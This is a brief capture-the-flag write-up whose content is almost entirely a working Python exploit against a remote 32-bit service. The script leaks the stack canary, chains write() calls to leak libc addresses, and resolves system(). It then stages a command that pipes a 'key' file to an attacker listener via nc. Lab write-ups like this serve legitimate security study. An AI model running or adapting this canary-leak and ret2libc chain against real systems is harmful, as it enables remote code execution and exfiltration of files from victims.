At first glance there was so much to set up for the environment that I wondered whether this was a hard challenge, but I actually solved it more easily than Nuclear.
This time, instead of struggling to get a shell, I had it print the key directly.
Time taken to solve: about two and a half hours...?
```python
from hackutil import *   # author's helper module: banner(), p32() (pack 32-bit LE), up32() (unpack, returns a tuple)
from socket import *
from time import *

HOST = '192.168.136.139'
PORT = 8888

#==============================================
pppr = 0x08048b2c                 # pop; pop; pop; ret gadget (cleans 3 args off the stack)
ppppr = 0x080495bc                # pop x4; ret gadget (unused)
read_plt = 0x08048620
read_got = 0x0804B010
write_plt = 0x080486E0
write_got = 0x0804B040            # unused
libc_main_got = 0x0804B038        # __libc_start_main@got
offset_read_system = 0x9aa40      # read - system in the target's libc
binsh = 0x0804970D                # "/bin/sh" in the binary (unused; command is staged in .bss instead)
bss = 0x0804b080                  # writable scratch area for the command string
#==============================================

banner()

print "===================[ Phase 1 : Canary leak ]=================="
s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
sleep(2)
s.recv(1024)
s.send('4')                       # pick the vulnerable menu option
sleep(0.2)
s.recv(1024)

# The buffer is 10 bytes; the 11th byte overwrites the canary's low 0x00 byte,
# so when the service echoes the buffer back the remaining 3 canary bytes follow it.
payload = 'y'*11
s.send(payload)
sleep(0.1)
data = s.recv(1024)
canary = up32(data[22:26])[0] & 0xFFFFFF00   # restore the null low byte
print "[*] Found Canary : "+hex(canary)
s.close()

print "==================[ Phase 2 : Library leak ]=================="
s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
sleep(2)
s.recv(1024)
s.send('4')
sleep(0.2)
s.recv(1024)

# buffer(10) + canary(4) + 12 bytes of saved regs/ebp, then the ROP chain.
# write(4, read@got, 4) and write(4, __libc_start_main@got, 4); fd 4 is the client socket.
payload2 = 'y'*10 + p32(canary) + 'A'*12
payload2 += p32(write_plt) + p32(pppr) + p32(4) + p32(read_got) + p32(4)
payload2 += p32(write_plt) + p32(pppr) + p32(4) + p32(libc_main_got) + p32(4)
s.send(payload2)
sleep(0.1)
data = s.recv(1024)
read_lib = up32(data[0:4])[0]
libc_main_lib = up32(data[4:8])[0]
system_lib = read_lib - offset_read_system    # resolve system() from the leaked read() address
print "[*] Found read_lib : "+hex(read_lib)
print "[*] Found libc_main_lib : "+hex(libc_main_lib)
print "[*] Found system_lib : "+hex(system_lib)
print '[*] &"/bin/sh" : '+hex(binsh)
s.close()

print "================[ Phase 3 : Attack with RTL ]================="
s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
sleep(2)
s.recv(1024)
s.send('4')
sleep(0.2)
s.recv(1024)

# read(4, bss, 0x100) stages the command string in .bss, then system(bss) runs it.
# "AAAA" is the dummy return address for system().
payload3 = 'y'*10 + p32(canary) + 'A'*12
payload3 += p32(read_plt) + p32(pppr) + p32(4) + p32(bss) + p32(0x100)
payload3 += p32(system_lib) + "AAAA" + p32(bss)
s.send(payload3)
sleep(0.1)
s.send('nc 192.168.136.1 12595 < key')      # ship the key file to a listener on the attacker host
sleep(0.1)
s.close()

print "==================[ Phase 4 : Got the Key ]==================="
```